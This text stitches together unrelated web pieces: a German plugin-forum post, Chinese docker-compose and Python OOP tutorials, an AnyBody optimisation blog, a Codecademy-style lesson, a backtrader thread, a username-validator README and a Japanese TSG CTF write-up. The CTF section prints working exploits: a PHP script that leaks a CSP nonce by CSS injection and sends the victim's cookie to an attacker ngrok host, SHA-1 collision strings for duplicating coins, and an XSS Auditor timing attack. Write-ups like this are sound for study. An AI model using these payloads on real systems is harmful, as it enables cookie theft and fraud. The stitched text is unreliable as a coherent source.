strCommand = "apt-get update && dpkg -i %s && apt-get -f install" % str(self.file_name)
print("[SerienRecoder] running update command ", strCommand)
self.container.execute(strCommand)
else:
self.container.appClosed.append(self.finishedPluginUpdate)
self.container.stdoutAvail.append(self.srlog)
strCommand = "opkg install --force-overwrite --force-depends --force-downgrade %s" % str(self.file_name)
print("[SerienRecoder] running update command ", strCommand)
self.container.execute(strCommand)
Minimal wäre die Änderung einfach ein reinziehen der einen Zeile ins if:Code
self.container.stdoutAvail.append(self.srlog)
if isDreamboxOS:
self.appClosed_conn = self.container.appClosed.connect(self.finishedPluginUpdate)
self.container.execute("apt-get update && dpkg -i %s && apt-get -f install" % str(self.file_name))
else:
self.container.appClosed.append(self.finishedPluginUpdate)
self.container.execute("opkg install --force-overwrite --force-depends --force-downgrade %s" % str(self.file_name))
Mit dieser Änderung läuft der Update auch unter dreamOS sauber durch.
Hallo,
wie funktioniert es in der neuen Version wenn man neue Serien über den Text suchen will.
Im Menue gelb und dann blau funktioniert nicht mehr.
mfg
zp
Wie es auch auf der verlinkten Downloadseite unter Änderungen steht: Taste 1 drücken
hallo
ok danke, hatte ich nicht gesehen. funktioniert
mfg
|
0x00 关于docker compose
可以把docker-compose当作docker命令的封装,它是一个用来把 docker 自动化的东西,docker-compose可以一次性管理多个容器,通常用于需要多个容器相互配合来完成某项任务的场景。
0x01 安装与卸载
0x02 一些常用命令
构建容器:docker-compose up -d
启动容器:docker-compose start
停止容器:docker-compose stop
重启容器:docker-compose restart
kill容器:docker-compose kill
删除容器:docker-compose rm
bash连接容器:docker-compose exec [services_name] bash
执行一条命令:docker-compose run [services_name] [command]
0x03 docker-compose简单应用
结构
.
├── Dockerfile
├── docker-compose.yml
└── src
├── app.py
└── sources.list
1 directory, 4 files
Dockerfile
FROM ubuntu:14.04.4
MAINTAINER reber <1070018473@qq.com>
COPY ./src /code #将data挂载到容器的code
WORKDIR /code
RUN cp sources.list /etc/apt/sources.list && apt-get update
RUN apt-get install -y python-dev python-pip
RUN pip install flask redis
CMD ["python","app.py"]
docker-compose.yml(构建两个services)
version: '3' services: web: image: "dockercompose:test" #镜像名字和标签 build: . ports: - "8888:5000" #将容器的5000映射到本机的8888端口 volumes: - ./src:/code #挂载后更改本机文件时容器中的文件会随之改变,反之一样 links: - redis #links后在web中访问redis就可以通过redis这个名字来访问而不用通过ip,比如ping -c 2 redis redis: image: "redis:alpine" ports: - "3333:6379"
app.py
import time
import redis
from flask import Flask
app = Flask(__name__)
cache = redis.Redis(host='redis', port=6379)
def get_hit_count():
retries = 5
while True:
try:
return cache.incr('hits')
except redis.exceptions.ConnectionError as exc:
if retries == 0:
raise exc
retries -= 1
time.sleep(0.5)
@app.route('/')
def hello():
count = get_hit_count()
return 'Hello World! I have been seen {} times.\n'.format(count)
if __name__ == "__main__":
app.run(host="0.0.0.0", debug=True)
操作容器
[12:21 reber@wyb in ~/dockercomposetest]
#构建并运行容器
➜ docker-compose up -d
Creating dockercomposetest_redis_1 ...
Creating dockercomposetest_redis_1 ... done
Creating dockercomposetest_web_1 ...
Creating dockercomposetest_web_1 ... done
#拉取了两个镜像ubuntu和redis,在此基础上生成镜像dockercompose:test
➜ docker images
REPOSITORY TAG IMAGE ID CREATED SIZE
dockercompose test c421a84a85a9 About an hour ago 415MB
redis alpine 05635ee9e1c7 6 days ago 40.8MB
ubuntu 14.04.4 0ccb13bf1954 2 years ago 188MB
#生成两个容器
➜ docker ps
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
b1a5d90b0646 dockercompose:test "python app.py" 36 seconds ago Up 35 seconds 0.0.0.0:8888->5000/tcp dockercomposetest_web_1
364d6cf7ae50 redis:alpine "docker-entrypoint..." 36 seconds ago Up 35 seconds 0.0.0.0:3333->6379/tcp dockercomposetest_redis_1
#执行一条命令就会生成一个容器
➜ docker-compose run web pwd
Starting dockercomposetest_redis_1 ... done
/code
➜ docker-compose run web ls
Starting dockercomposetest_redis_1 ... done
app.py sources.list
➜ docker ps -a
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
9b74c86f8f99 dockercompose:test "ls" 15 seconds ago Exited (0) 10 seconds ago dockercomposetest_web_run_2
6025c6379617 dockercompose:test "pwd" 20 seconds ago Exited (0) 19 seconds ago dockercomposetest_web_run_1
b1a5d90b0646 dockercompose:test "python app.py" 9 minutes ago Up 9 minutes 0.0.0.0:8888->5000/tcp dockercomposetest_web_1
364d6cf7ae50 redis:alpine "docker-entrypoint..." 9 minutes ago Up 9 minutes 0.0.0.0:3333->6379/tcp dockercomposetest_redis_1
#查看运行情况
➜ curl http://127.0.0.1:8888
Hello World! I have been seen 3 times.
➜ redis-cli -h 127.0.0.1 -p 3333
127.0.0.1:3333> keys *
1) "hits"
127.0.0.1:3333> get hits
"3"
127.0.0.1:3333> exit
常用命令
[12:31 reber@wyb in ~/dockercomposetest]
➜ docker-compose up -d
Creating dockercomposetest_redis_1 ...
Creating dockercomposetest_redis_1 ... done
Creating dockercomposetest_web_1 ...
Creating dockercomposetest_web_1 ... done
➜ docker ps
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
d8b6270f1b63 dockercompose:test "python app.py" 7 seconds ago Up 6 seconds 0.0.0.0:8888->5000/tcp dockercomposetest_web_1
4d1965d53fe5 redis:alpine "docker-entrypoint..." 7 seconds ago Up 6 seconds 0.0.0.0:3333->6379/tcp dockercomposetest_redis_1
➜ docker-compose stop
Stopping dockercomposetest_web_1 ... done
Stopping dockercomposetest_redis_1 ... done
[12:31 reber@wyb in ~/dockercomposetest]
➜ docker ps -a
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
0582adca2a2d dockercompose:test "python app.py" 12 seconds ago Exited (0) 7 seconds ago dockercomposetest_web_1
1f8417160da3 redis:alpine "docker-entrypoint..." 12 seconds ago Exited (0) 6 seconds ago dockercomposetest_redis_1
➜ docker-compose rm
Going to remove dockercomposetest_web_1, dockercomposetest_redis_1
Are you sure? [yN] y
Removing dockercomposetest_web_1 ... done
Removing dockercomposetest_redis_1 ... done
➜ docker ps -a
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
0x04 构建tomcat实例
➜ tree
.
├── Dockerfile
├── docker-compose.yml
├── src
│ ├── apache-tomcat-8.0.53.tar.gz
│ ├── jdk-8u181-linux-x64.tar.gz
│ └── sources.list
└── web
└── index.jsp
2 directories, 6 files
➜ cat Dockerfile
FROM ubuntu:14.04.4
MAINTAINER reber <1070018473@qq.com>
COPY ./src /data
WORKDIR /data
RUN cp sources.list /etc/apt/sources.list && apt-get update
RUN tar -zxvf apache-tomcat-8.0.53.tar.gz && mv apache-tomcat-8.0.53 /opt
RUN tar -zxvf jdk-8u181-linux-x64.tar.gz && mv jdk1.8.0_181 /opt
RUN rm -rf /data
ENV JAVA_HOME="/opt/jdk1.8.0_181"
ENV JAVA_BIN="$JAVA_HOME/bin"
ENV CLASSPATH="$JAVA_HOME/lib"
ENV PATH="$JAVA_HOME/bin":$PATH
WORKDIR /opt/apache-tomcat-8.0.53/webapps/ROOT
ENTRYPOINT ["tail","-f","/dev/null"] #使容器一直运行,不自动退出
➜ cat docker-compose.yml
version: '3'
services:
tomcat:
image: ubuntu:tomcat
build: .
ports:
- "8888:8080"
volumes:
- ./web:/opt/apache-tomcat-8.0.53/webapps/ROOT
|
The AnyBody Modeling System (AMS) provides a build-in optimizationclass AnyOptStudy, and with it you have the opportunity to solve advanced mathematical optimization problems.
See also: You can get a taste of how it works in the newly updated tutorial on parameter and optimization studies
Extending the optimization
Of course there can be situations were you want to do a little more than what the AMS optimization offers. Say you have two seperate models were you wanted to optimize some parameter acrossthe performance in both models? or perhaps you wanted to use a specific algorithm suitable for your exact problem? To solve these kinds of problems, youcould perform the optimization process from a third party software.
In this post we will demonstrate how these problems can be solved using Python.This topic is part of a new Anybody Tutorialwhich describes the content of this post indetail.
As part of the post we will show how to integrate the Scipy optimization packageScipy.optimize.minimize by running the Anybody 2D bike model from Python, using the AnyPyTools package.
Fig. 1: The 2D bike model used in this example and the new tutorial.
Optimization example
The process of performing optimization of AMS models through Python can be sketched in four steps:
Defining a function to call the models using AnyPyTools and extract the designvariables
Defining a objective function to be either minimized or maximized
Defining the constraints and bounds of the problem
Running the optimization
And the whole Python code to complete these four steps could look like this:
import math
import scipy
from anypytools import AnyPyProcess
from anypytools.macro_commands import Load, OperationRun, Dump SetValue
def run_model(saddle_height, saddle_pos, silent=False):
"""Run the AnyBody model and return the metabolism results"""
macro = [
Load("BikeModel2D.main.any"),
SetValue("Main.BikeParameters.SaddleHeight", saddle_height),
SetValue("Main.BikeParameters.SaddlePos", saddle_pos),
OperationRun("Main.Study.InverseDynamics"),
Dump("Main.Study.Output.Pmet"),
Dump("Main.Study.Output.Abscissa.t"),
]
app = AnyPyProcess(silent=silent)
results = app.start_macro(macro)
return results[0]
def objfun(designvars):
"""Calculate the objective function value"""
saddle_height = designvars[0]
saddle_pos = designvars[1]
result = run_model(saddle_height, saddle_pos, silent=True)
if "ERROR" in result:
raise ValueError("Failed to run model")
pmet = scipy.integrate.trapz(result["Pmet"], result["Abscissa.t"])
return float(pmet)
def seat_distance_constraint(designvars):
"""Compute contraint value which must be larger than zero"""
return math.sqrt(designvars[0] ** 2 + designvars[1] ** 2) - 0.66
constaints = {"type": "ineq", "fun": seat_distance_constraint}
bounds = [(0.61, 0.69), (-0.22, -0.05)]
initial_guess = (0.68, -0.15)
solution = scipy.optimize.minimize(
objfun, initial_guess, constraints=constaints, bounds=bounds, method="SLSQP"
)
print(solution)
Breaking down the sections
To elaborate a little on the sections, the first part defines the run_modelfunction. This function takes in two arguments and assigns them to thesaddleheight and saddleposition in the AMS model. The function returns thePmet value for each timestep in the model.
Details and advanced options of this function and it’s components can be found in the AnyPyTools documentation.
The second part defines the objective function in question. This function takes in alist of design variable arguments and utilizes the run_model function,afterwards it integrates the Pmet over the whole time series and returns theresult.
Next up, the constraints and bounds are defined. For this example only aseat distance constraint is present. The bounds for each of the designvariables is defined in the bounds variable. Lastly, the optimization process isperformed, and here it envokes the SLSQPalgorithm.
For more details and examples of the capabilities of theScipy.optimizepackage, follow thislink.
And there we have it. A full optimization of a AMS model, and a easy template tobuild other and more advanced optimization processes upon.
Try it now: Make sure to try out the full AMS tutorialhere.
This post is hosted on GitHub, feel free to provide feedback here.
|
As you can tell from your work with Calvin Coolidge’s Cool College, once you start including lots of if statements in a function the code becomes a little cluttered and clunky. Luckily, there are other tools we can use to build control flow.
else statements allow us to elegantly describe what we want our code to do when certain conditions are not met.
else statements always appear in conjunction with if statements. Consider our waking-up example to see how this works:
if weekday:
print("wake up at 6:30")
else:
print("sleep in")
In this way, we can build if statements that execute different code if conditions are or are not met. This prevents us from needing to write if statements for each possible condition, we can instead write a blanket else statement for all the times the condition is not met.
Let’s return to our if statement for our movie streaming platform. Previously, all it did was check if the user’s age was over 13 and if so, print out a message. We can use an else statement to return a message in the event the user is too young to watch the movie.
if age >= 13:
print("Access granted.")
else:
print("Sorry, you must be 13 or older to watch this movie.")
Instructions
1.
Calvin Coolidge’s Cool College has another request for you. They want you to add an additional check to a previous if statement. If a student is failing to meet both graduation requirements, they want it to print:
"You do not meet the requirements to graduate."
Add an else statement to the existing if statement.
|
```(aka backtick or grave accent) in a single line before and after the block. See: http://commonmark.org/help/
Settings lines and params on __init__
Ok, for my factor and index strategy I have created a Feed like this:
class MultiFactorFeed(bt.feeds.GenericCSVData):
factors = ("DIV_YIELD", "EBITDA", "EPS")
indices = ("SP50", "DOW")
lines = factors + indices
params = (
('dtformat', '%Y-%m-%d'),
# This avoids time adjustment to the end of the session
('timeframe', bt.TimeFrame.Minutes),
('datetime', 0),
('time', -1),
('open', 1),
('high', 1),
('low', 1),
('close', 1),
('volume', -1),
('openinterest', -1)
) + tuple((el, i + 2) for i, el in enumerate(lines))
Explanation is simple:
"factors" cols contain the additional data items, beyond price, for my multi-factor strategy
"indices" cols contain the market index membership, in binary. 1 means that equity A is in index B at time T. 0 means it is not.
I use daily price data, no time portion (-1), only with close price (all to position 1), without volume (-1) or open interest (-1).
All the other columns starting from 2 are first factors, then indices.
A few questions:
Is there anyway to make MultiFactorFeed more abstract, so that I could pass factors and indices on initand reuse the class when I change factor or index composition? There seems to be a lot of MetaClass black magic that interferes with that. Something like this fails:
class MultiFactorFeed(bt.feeds.GenericCSVData):
def __init__(self, dataname=dataname, name=name, factors=factors, indices=indices):
self.factors = factors
self.indices = indices
self.lines = factors + indices
self.params = (
('dtformat', '%Y-%m-%d'),
# This avoids time adjustment to the end of the session
('timeframe', bt.TimeFrame.Minutes),
('datetime', 0),
('time', -1),
('open', 1),
('high', 1),
('low', 1),
('close', 1),
('volume', -1),
('openinterest', -1)
) + tuple((el, i + 2) for i, el in enumerate(self.lines))
super().__init__(dataname, name)
I am using ('timeframe', bt.TimeFrame.Minutes) to avoid my dates being turned from:
2002-12-27 00:00:00
into:
2002-12-27 23:59:59.999989
And be missaligned with other data sources. Is there a better, cleaner way to disable that "end of session" feature?
Thank you!
Is there anyway to make MultiFactorFeed more abstract, so that I could pass factors and indices on init and reuse the class when I change factor or index composition? There seems to be a lot of MetaClass black magic that interferes with that. Something like this fails:
linesis a declaration and all instances of theMultiFactorFeedclass are expected to have the samelines.
What you need is to create a class on-the-fly with
type, which defines the extra lines you are defining.
MyDynamicLinesClass = type(give_it_a_random_name, bt.feeds.GenericCSVData, dct={'lines': factors + indices})
data = MyDynamicLinesClass(*some_args, **kwargs)
cerebro.adddata(data)
And be missaligned with other data sources. Is there a better, cleaner way to disable that "end of session" feature?
Not automatically. The reason to push daily timeframes to the limit of the day is to avoid them being overtaken by lower resolution timeframes. Because if the time of the daily resolution is
00:00:00and is put in the same scheme as a data feed with minute resolution, a time00:00:01in the minute resolution data feed will surpass the daily resolution, which cannot happen in real life.
It works! Though apparently the second argument has to be a tuple, correct?
AssetFeed = type("AssetFeed", (bt.feeds.GenericCSVData,), {"lines" : lines, "params" : params})
Thank you very much.
Not automatically. The reason to push daily timeframes to the limit of the day is to avoid them being overtaken by lower resolution timeframes. Because if the time of the daily resolution is 00:00:00 and is put in the same scheme as a data feed with minute resolution, a time 00:00:01 in the minute resolution data feed will surpass the daily resolution, which cannot happen in real life.
Correction: use the
sessionend=datetime.time(hh, mm, ss, us)parameter when instantiating a data feed and that will be the end of session.
|
TSG CTFにチームNaruseJunで出ました。4099ptsを獲得して3位でした。
私はWeb問のみを解きました。以下write-upです。
BADNONCE Part 1 (247pts)
CSPが有効になっているページでXSSしてCookieを盗ってください、という問題でした。
<meta http-equiv="Content-Security-Policy" content="script-src 'nonce-<?= $nonce ?>';">
問題名が BADNONCE なので明らかにnonceの実装が悪そうです。 実際、以下のようにセッションIDに対してnonceが固定なので、これが漏れるとXSSが可能になります。
session_start();
$nonce = md5(session_id());
件のnonceは、ページ内の要素の属性として存在しています。
<script nonce=<?= $nonce ?>>
console.log('Welcome to the dungeon :-)');
</script>
ところで、このページではscript-srcのみ制限されているので、たとえばスタイルシートなどは外部ソースから読み込み放題です。 したがって、CSS Injectionが可能です。セレクタを工夫することによって、要素の属性値を特定することができますね。
ただし、管理者のブラウザを模したクローラは、毎回異なるPHPSESSIDを持つため、1度の起動で最後までnonceを抜きとって、XSSを踏ませるところまでやらないといけません。 ちょっと面倒ですが、管理者に攻撃車が用意したURLをIFRAMEで開き続けるページを踏ませて、InjectするCSSを変えながら、最終的にXSSを発火させるようにしました。 以下のような実装になりました。Web問のExploitにしてはちょっと重めかも。もっと頭のいい方法が存在する可能性もあり。
<?php
if (array_key_exists("save", $_GET)) {
file_put_contents("flag.txt", $_GET["save"] . PHP_EOL, LOCK_EX | FILE_APPEND);
}
else if (array_key_exists("nonce", $_GET)) {
$nonce = file_get_contents("nonce.txt");
if (strlen($nonce) < strlen($_GET["nonce"])) {
file_put_contents("nonce.txt", $_GET["nonce"], LOCK_EX);
}
}
else if (array_key_exists("css", $_GET)) {
header("Content-Type: text/css");
echo("script { display: block }" . PHP_EOL);
$nonce = file_get_contents("nonce.txt");
$chars = str_split("0123456789abcdef");
foreach ($chars as $c1) {
foreach ($chars as $c2) {
$x = $nonce . $c1 . $c2;
echo("[nonce^='" . $x . "'] { background: url(http://cf07fd07.ap.ngrok.io/?nonce=" . $x . ") }" . PHP_EOL);
}
}
}
else if (array_key_exists("go", $_GET)) {
$nonce = file_get_contents("nonce.txt");
if (strlen($nonce) < 32) {
header("Location: http://35.187.214.138:10023/?q=%3Clink%20rel%3D%22stylesheet%22%20href%3D%22http%3A%2F%2Fcf07fd07.ap.ngrok.io%2F%3Fcss%3D" . microtime(true) . "%22%3E");
}
else {
header("Location: http://35.187.214.138:10023/?q=%3Cscript%20nonce%3D%22" . $nonce . "%22%3Efetch(%22http%3A%2F%2Fcf07fd07.ap.ngrok.io%2F%3Fsave%3D%22%20%2B%20encodeURIComponent(document.cookie))%3C%2Fscript%3E");
}
}
else if (array_key_exists("start", $_GET)) {
file_put_contents("nonce.txt", "", LOCK_EX);
file_put_contents("flag.txt", "", LOCK_EX);
?>
<html>
<body>
<script>
setInterval(() => {
const iframe = document.createElement("iframe");
iframe.src = `?go=${(new Date).getTime()}`;
document.body.appendChild(iframe);
}, 256);
</script>
</body>
</html>
<?php
}
else {
echo("E R R O R !");
}
?>
Secure Bank (497pts)
rubyで書かれたアプリケーションで、コインの送受信ができます。 たくさんのコインを集めれば、FLAGが入手できるようです。
get '/api/flag' do
return err(401, 'login first') unless user = session[:user]
hashed_user = STRETCH.times.inject(user){|s| Digest::SHA1.hexdigest(s)}
res = DB.query 'SELECT balance FROM account WHERE user = ?', hashed_user
row = res.next
balance = row && row[0]
res.close
return err(401, 'login first') unless balance
return err(403, 'earn more coins!!!') unless balance >= 10_000_000_000
json({flag: IO.binread('data/flag.txt')})
end
怪しいのは送金コードで、こういう形。
post '/api/transfer' do
return err(401, 'login first') unless src = session[:user]
return err(400, 'bad request') unless dst = params[:target] and String === dst and dst != src
return err(400, 'bad request') unless amount = params[:amount] and String === amount
return err(400, 'bad request') unless amount = amount.to_i and amount > 0
sleep 1
hashed_src = STRETCH.times.inject(src){|s| Digest::SHA1.hexdigest(s)}
hashed_dst = STRETCH.times.inject(dst){|s| Digest::SHA1.hexdigest(s)}
res = DB.query 'SELECT balance FROM account WHERE user = ?', hashed_src
row = res.next
balance_src = row && row[0]
res.close
return err(422, 'no enough coins') unless balance_src >= amount
res = DB.query 'SELECT balance FROM account WHERE user = ?', hashed_dst
row = res.next
balance_dst = row && row[0]
res.close
return err(422, 'no such user') unless balance_dst
balance_src -= amount
balance_dst += amount
DB.execute 'UPDATE account SET balance = ? WHERE user = ?', balance_src, hashed_src
DB.execute 'UPDATE account SET balance = ? WHERE user = ?', balance_dst, hashed_dst
json({amount: amount, balance: balance_src})
end
ぱっと見たところ、トランザクションを考慮していないので、高頻度でリクエストを飛ばせばRace Conditionで二重送金ができそうだったんですが、軽く試したところ、タイミングがシビアでほとんどうまくいかなかったので、この方針は諦めました。
ところで、このコードをもう少しよく見ると、宛先と送金元が同一のユーザであったとき、コインが増殖することは明らかです。 もちろん、自分自身への送金はエラーになる実装となっているんですが、残高の照会をユーザ名をハッシュした値で行っているのに対して、ユーザの同一性判定は元の文字列で行っています。 つまりは、別の文字列であって、SHA1ハッシュの結果が同一になる文字列の組がもし存在すれば、無限にコインを増やすことができそうです。
SHA1の衝突といえば……SHAtteredですよね。 詳しい理屈はググってもらうとして、これを用いれば、先に述べた要件を満たすような文字列(というかバイト列)の組が用意できます。
JSONとしてnon-printableな文字を送る際に破壊されないように注意しつつ、以下のようにして用意しました。
<?php
$s1 = file_get_contents("shattered-1.pdf");
$s2 = file_get_contents("shattered-2.pdf");
$t1 = substr($s1, 0, 320) . "narusejun";
$t2 = substr($s2, 0, 320) . "narusejun";
echo(sha1($t1) . PHP_EOL);
echo(sha1($t2) . PHP_EOL);
function toStr($c) {
$i = ord($c);
if ($c == '"') {
return '\\"';
}
if ($c == '%') {
return '%%';
}
if ($i < 0x20) {
return sprintf("\\u%04x", $i);
}
if ($i < 0x7F) {
return $c;
}
return sprintf("\\x%02x", ord($c));
}
$u1 = implode(array_map(toStr, str_split($t1)));
$u2 = implode(array_map(toStr, str_split($t2)));
echo($u1 . PHP_EOL);
echo($u2 . PHP_EOL);
?>
この文字列のどちらかを使って登録した上で、もう一方の文字列を宛先として指定して送金すると、コインが増殖します。 curlを使うと容易です。
RECON (500pts)
Web問です。PHPで実装された、プロフィールを登録できるサービスです。 秘密の質問として20種類のフルーツが好きか否かを選択できるようになっていて、どうやらadminの好きなフルーツをRECONすれば良いみたいです。
ソースコードを見ると、自身のプロフィールを確認するページで露骨にCSPが弱められていて、怪しさがあります。
$response->withHeader("Content-Security-Policy", "script-src-elem 'self'; script-src-attr 'unsafe-inline'; style-src 'self'")
この要素は新しい機能なので、script-src-elemとscript-src-attrが効いていなくて、実質XSSし放題になっているようでした。 しかしながら、このページはログインしたユーザ自身のプロフィールを表示するものですので、狙った相手にコードを実行させるのは厳しそうな雰囲気があります。
ところで、そもそも何故script-src-attrなどという特殊な(?)制限が付されているのでしょうか? この答えは、このページのソースを注意深く見るとすぐに気が付きました。
🍇 <input type="checkbox" id="grapes" onchange="grapes.checked=false;" >
🍈 <input type="checkbox" id="melon" onchange="melon.checked=false;" >
🍉 <input type="checkbox" id="watermelon" onchange="watermelon.checked=false;" >
🍊 <input type="checkbox" id="tangerine" onchange="tangerine.checked=false;" >
🍋 <input type="checkbox" id="lemon" onchange="lemon.checked=false;" >
🍌 <input type="checkbox" id="banana" onchange="banana.checked=false;" >
🍍 <input type="checkbox" id="pineapple" onchange="pineapple.checked=false;" >
🍐 <input type="checkbox" id="pear" onchange="pear.checked=false;" >
🍑 <input type="checkbox" id="peach" onchange="peach.checked=false;" >
🍒 <input type="checkbox" id="cherries" onchange="cherries.checked=false;" >
🍓 <input type="checkbox" id="strawberry" onchange="strawberry.checked=false;" >
🍅 <input type="checkbox" id="tomato" onchange="tomato.checked=false;" >
🥥 <input type="checkbox" id="coconut" onchange="coconut.checked=false;" >
🥭 <input type="checkbox" id="mango" onchange="mango.checked=false;" >
🥑 <input type="checkbox" id="avocado" onchange="avocado.checked=false;" >
🍆 <input type="checkbox" id="aubergine" onchange="aubergine.checked=false;" >
🥔 <input type="checkbox" id="potato" onchange="potato.checked=false;" >
🥕 <input type="checkbox" id="carrot" onchange="carrot.checked=false;" >
🥦 <input type="checkbox" id="broccoli" onchange="broccoli.checked=false;" >
🍄 <input type="checkbox" id="mushroom" onchange="mushroom.checked=false;" >
秘密の質問がプロフィールページに表示されているんですが、この変更を禁止する目的でJavaScriptが用いられているのでした! このコードのみ実行できるようにする目的で、部分的なunsafe-inlineが許容されていたようです。
もし、この小さなJavaScriptコードを盗むことができれば、adminの好きなフルーツを知ることできそうです。 このページでは、X-XSS-Protection: 1; mode=blockというヘッダが送信されていて、XSS Auditorがブロックモードで動作することが期待されていて、adminのブラウザもこれに従っているでしょう。 こういう場合に、XSS Auditorの誤検出を利用して、ページ内のスクリプトを盗む手法が存在します。
これを利用できそうです。(できました。) 以下のような2つのIFRAMEを表示させれば、どちらか一方をXSS Auditorがブロックするはずです。
<iframe src='http://34.97.74.235:10033/profile?onchange="melon.checked=true;"'></iframe>
<iframe src='http://34.97.74.235:10033/profile?onchange="melon.checked=false;"'></iframe>
この性質を利用し、攻撃者のページで2つのIFRAMEを開かせて、どちらがブロックされたかを判別すれば良いですね。 IFRAME要素のcontentWindow.lengthを見ると、XSS Auditorが作動したか否かを簡単に判別できるようでしたが、手元で試したときに何故かうまくいかなかったので(これは勘違いだったかもしれませんが)、onloadが発火するまでの時間を計測するちょっと面倒な方法で判別しています。 XSS Auditorが作動すると、関連リソースの読み込みが走らないので、onloadが早く呼ばれるはずです。
以下のように実装し、IFRAMEをプロフィールに埋め込んで、adminにアクセスさせました。 JavaScriptの記法モダンだったりレガシーだったりしていて、気持ち悪いんですが、終了ギリギリで解いていたためいろいろ焦っていて、見当違いの試行錯誤をしていた名残です。
<?php
if(array_key_exists("save", $_GET)){
file_put_contents("save.txt", $_GET["save"] . PHP_EOL, FILE_APPEND | LOCK_EX);
echo("OK!");
}else{
?>
<html>
<body>
<script>
function test(key, val){
return new Promise(function(resolve){
const iframe = document.createElement("iframe");
iframe.onload = function(){
iframe.remove();
resolve([key, val, new Date().getTime() - time]);
};
iframe.src = `http://34.97.74.235:10033/profile?onchange="${key}.checked=${val};"`;
const time = new Date().getTime();
document.body.appendChild(iframe);
});
}
(async () => {
const results = [];
for(let i = 0; i < 1; i++){
results.push([
await test("mushroom", true),
await test("mushroom", false),
]);
}
location.href = "?save=" + results;
})();
</script>
</body>
</html>
<?php
}
?>
これを用いて、フルーツ1種類ごとに計測した結果が以下のとおりです。 Captchaを連打する必要があって、激ツラかったです。チームメイトにひたすらCaptchaしてもらいました。(もっと頭の良い実装をすればよかった気もしますが。)
フルーツ trueのonload(ms) falseのonload(ms) 判定結果
grapes 84 334 TRUE
melon 347 65 FALSE
watermelon 245 47 FALSE
tangerine 78 394 TRUE
lemon 83 418 TRUE
banana 73 255 TRUE
pineapple 79 452 TRUE
pear 252 48 FALSE
peach 74 281 TRUE
cherries 76 336 TRUE
strawberry 79 318 TRUE
tomato 77 353 TRUE
coconut 77 333 TRUE
mango 92 404 TRUE
avocado 254 47 FALSE
aubergine 85 333 TRUE
potato 249 46 FALSE
carrot 72 321 TRUE
broccoli 428 40 FALSE
mushroom 87 388 TRUE
あとは、この結果を用いてadminのrecoveryメッセージ(FLAG)を表示させることができました。
総括
Web問しか触っていないので他のジャンルはわかりかねますが、良い問題でした。
誘導が適切で、guessが最小限で済んだ
扱っているテーマも面白いものだった
おわりです。 なんか💰を貰えるらしいので、焼肉にでも行きたいです🐦
|
class Parent2():
print('我是第二个爹')
class Parent():
print('我是第一个爹')
class SubClass(Parent, Parent2):
print('我是子类')
#
# 结果: 我是第二个爹
# 我是第一个爹
# 我是子类
#注意:类在定义的时候就执行类体代码,执行顺序是从上到下
__bases __可以获取当前类所有的父类 使用SubClass. __bases __
print(SubClass.__bases__)
(<class '__main__.Parent'>, <class '__main__.Parent2'>)
将父类对象应用于子类的特征就是多态。比如创建一个螺丝类,螺丝类有两个属性:粗细和螺纹密度;然后在创建两类,一个是长螺丝,一个是短螺丝,并且他们都继承了螺丝类。这样长螺丝类和短螺丝类不仅具有相同的特征,还具有不同的特征。子类继承父类特征的同时,也具有了自己的特征,并且能够实现不同的效果,这就是多态的结构。
类属性
实例属性
实例方法
类方法
静态方法(扩展)
实现:
class Game(object):
top_score = 0 # 游戏最高分,类属性
@staticmethod
def show_help(): # 静态方法
print("帮助信息:让僵尸走进房间")
@classmethod
def show_top_score(cls): # 类方法
print("游戏最高分是 %d" % cls.top_score)
def __init__(self, player_name):
self.player_name = player_name # 实例属性
def start_game(self): # 实例方法
print("[%s] 开始游戏..." % self.player_name)
Game.top_score = 999 # 使用类名.修改历史最高分
测试:
# 1. 查看游戏帮助
Game.show_help()
# 2. 查看游戏最高分
Game.show_top_score()
# 3. 创建游戏对象,开始游戏
game = Game("小明")
game.start_game()
# 4. 游戏结束,查看游戏最高分
Game.show_top_score()
程序在运⾏过程中可能会出现⼀些错误。⽐如: 使⽤了不存在的索引,两个不
同类型的数据相加…这些错误我们称之为异常
处理异常 程序运⾏时出现异常,⽬的并不是让我们的程序直接终⽌!Python
是希望在出现异常时,我们可以编写代码来对异常进⾏处理
当在函数中出现异常时,如果在函数中对异常进⾏了处理,则异常不会在进
⾏传播。如果函数中没有对异常进⾏处理,则异常会继续向函数调⽤传播。
如果函数调⽤处处理了异常,则不再传播异常,如果没有处理则继续向调⽤
处传播。直到传递到全局作⽤域(主模块)如果依然没有处理,则程序终⽌,并
显示异常信息。
当程序运⾏过程中出现异常以后,所有异常信息会保存到⼀个异常对象中。
⽽异常传播时,实际上就是异常对象抛给了调⽤处
try语句
try:
代码块(可能出现错误的语句)
except 异常类型 as 异常名:
代码块(出现错误以后的处理⽅式)
except 异常类型 as 异常名:
代码块(出现错误以后的处理⽅式)
except 异常类型 as 异常名:
代码块(出现错误以后的处理⽅式)
....
else:
代码块(没出错时要执⾏的语句)
finally:
代码块(是否出错该代码块都会执⾏)
try是必须的 else有没有都可以
except和finally⾄少有⼀个
|
python-usernames
Python library to validate usernames suitable for use in public facing applications where use can choose login names and sub-domains.
Features
Provides a default regex validator
Validates against list of banned words that should not be used as username.
Python 2.7, 3.4, 3.5, 3.6, 3.7, 3.8 & pypi
Installation
pip install python-usernames
Usages
from usernames import is_safe_username
>>> is_safe_username("jerk")
False # contains one of the banned words
>>> is_safe_username("handsome!")
False # contains non-url friendly `!`
is_safe_username takes the following optional arguments:
whitelist: a case insensitive list of words that should be considered as always safe. Default:[]
blacklist: a case insensitive list of words that should be considered as unsafe. Default:[]
max_length: specify the maximun character a username can have. Default:None
regex: regular expression string that must pass before the banned : words is checked.
The default regular expression is as follows:
^ # beginning of string
(?!_$) # no only _
(?![-.]) # no - or . at the beginning
(?!.*[_.-]{2}) # no __ or _. or ._ or .. or -- inside
[a-zA-Z0-9_.-]+ # allowed characters, atleast one must be present
(?<![.-]) # no - or . at the end
$ # end of string
Further Reading
Note:
Words like bigcock12 will validated just fine, only equality against the banned word lists is checked. We don't try to be smart to avoid Scunthorpe problem. If you can come up with a algorithm/solution, please create an issue/pr :).
License
MIT
|
openFrameworks(c++)の中でpythonを実行する.
この記事は, 偉大なる先駆者様の記事を試させていただいた, というだけの個人的な備忘録です.
当該記事はつい先ほど投稿された @Hzikajr さんの記事
http://qiita.com/Hzikajr/items/afe73cb287af5ab90265
です.
